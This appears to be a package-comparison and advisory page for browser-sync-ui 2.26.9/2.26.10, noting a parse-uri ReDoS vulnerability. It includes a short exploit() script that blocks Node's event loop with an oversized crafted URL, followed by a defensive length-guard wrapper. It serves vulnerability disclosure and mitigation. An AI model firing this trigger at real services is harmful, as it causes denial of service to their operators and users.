Browser-sync-ui is the user interface (UI) package for BrowserSync. Versions 2.26.10 and 2.26.9 are nearly identical: both declare the same runtime dependencies, including immutable, server-destroy, stream-throttle, socket.io-client, async-each-series, and connect-history-api-fallback, which provide the real-time update channel and request handling the UI relies on. Both versions also declare the same development dependencies: chai, mocha, and sinon for testing, webpack for module bundling, jshint for linting, easy-svg for SVG handling, and pretty-js for code formatting.
The primary difference between the two versions is the release date. Version 2.26.10 was published on July 17, 2020, one day after version 2.26.9 (July 16, 2020). The unpacked size differs by a single byte, from 4785696 to 4785697 bytes (not 1 KB). The package metadata documents no other change, so any bug fixes or UI tweaks in the later version are undocumented; a one-byte difference is consistent with a very small edit. For developers, tracking the latest release is still the sensible default, but the metadata alone does not show what changed, and the dependency set, which is where the vulnerability exposure described below comes from, is the same in both versions.
Vulnerabilities related to version 2.26.10 of the package
parse-uri Regular expression Denial of Service (ReDoS)
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL. The parser is synchronous and regex-based, so a single oversized URL can keep the Node.js event loop busy in regex backtracking and stall the whole process for the duration; the practical mitigations are to move to a patched parse-uri release and to cap the length of URLs before they reach any regex-based parser. The snippet below reproduces the trigger.
const parseUri = require("parse-uri"); // vulnerable version: 1.0.9

function exploit() {
  // A long run of non-delimiter characters in the path is designed to cause
  // excessive backtracking in the parser's regular expression.
  const craftedInput = "http://example.com/" + "a".repeat(30000) + "?key=value";
  // parse-uri is synchronous, so this call blocks the event loop until the regex finishes.
  const start = Date.now();
  const result = parseUri(craftedInput);
  console.log("parse-uri took " + (Date.now() - start) + " ms");
  return result;
}

exploit();
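As an added example (not code from this page or from the parse-uri or browser-sync-ui projects), the defensive counterpart to the trigger above: a wrapper that rejects oversized input with an O(1) length check before any regex-based parser sees it, and then parses with the WHATWG URL parser built into Node, which is a state-machine parser rather than a backtracking regular expression. The 2048-character limit, the function name, and the output field names are assumptions chosen for illustration; the crafted input is constructed to match the exploit's payload shape.

```javascript
// Added example: length guard plus a non-backtracking parser.
// MAX_URL_LENGTH is an assumed policy value, not taken from the page.
const MAX_URL_LENGTH = 2048;

// Returns a parsed component object, or null when the input is rejected.
// Rejection happens before any regex-based work, so an attacker cannot make
// the guard itself expensive.
function safeParseUri(input, maxLength = MAX_URL_LENGTH) {
  if (typeof input !== "string") return null;
  if (input.length > maxLength) return null; // O(1) check, no backtracking possible

  let url;
  try {
    url = new URL(input); // WHATWG state-machine parser, linear in input length
  } catch {
    return null; // not an absolute URL
  }

  // Field names are assumptions for this example; slice() is used instead of
  // regexes so that no regular expression runs on attacker-controlled text.
  return {
    protocol: url.protocol.slice(0, -1), // drop trailing ":"
    user: url.username,
    password: url.password,
    host: url.hostname,
    port: url.port,
    path: url.pathname,
    query: url.search.slice(1), // drop leading "?"
    anchor: url.hash.slice(1), // drop leading "#"
  };
}

// Constructed input with the same shape as the exploit's payload.
const craftedInput = "http://example.com/" + "a".repeat(30000) + "?key=value";

// Runs the guard against the crafted input and reports whether it was rejected
// and how long the decision took.
function demo() {
  const start = process.hrtime.bigint();
  const rejected = safeParseUri(craftedInput) === null;
  const elapsedMs = Number(process.hrtime.bigint() - start) / 1e6;
  return { rejected, elapsedMs };
}

console.log(demo());
console.log(safeParseUri("http://user:pw@example.com:8080/a/b?x=1#frag"));
```

The length cap is the part that matters for ReDoS: even a patched regex parser benefits from it, because it bounds the work any parser can be made to do per request. Pick the limit from what the application actually needs (most browsers and proxies cap URLs in the low thousands of characters) rather than from the payload size in the exploit.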